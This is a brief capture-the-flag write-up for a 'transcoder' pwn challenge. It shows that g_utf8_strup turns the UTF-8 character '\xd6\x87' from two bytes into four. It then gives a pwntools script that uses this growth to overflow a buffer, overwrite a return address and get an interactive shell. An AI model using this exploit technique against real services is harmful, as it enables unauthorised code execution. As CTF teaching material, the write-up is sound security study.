Tags: pwn
Rating:
Trick **g_utf8_strup** to return more bytes than the original input after conversion.
**g_utf8_strup** returns 4 bytes instead of 2 bytes after converting the UTF-8 char "\xd6\x87", for example.
Exploit code:
```
from pwn import *
r = remote("transcoder.hitbctf.nl", 1234)
ret = "\x90\x08\x40"
r.sendline("2")
r.recvuntil("STRING> ")
r.sendline("\xd6\x87"*68 + "$0;".ljust(8, " ") + ret)
r.interactive()
```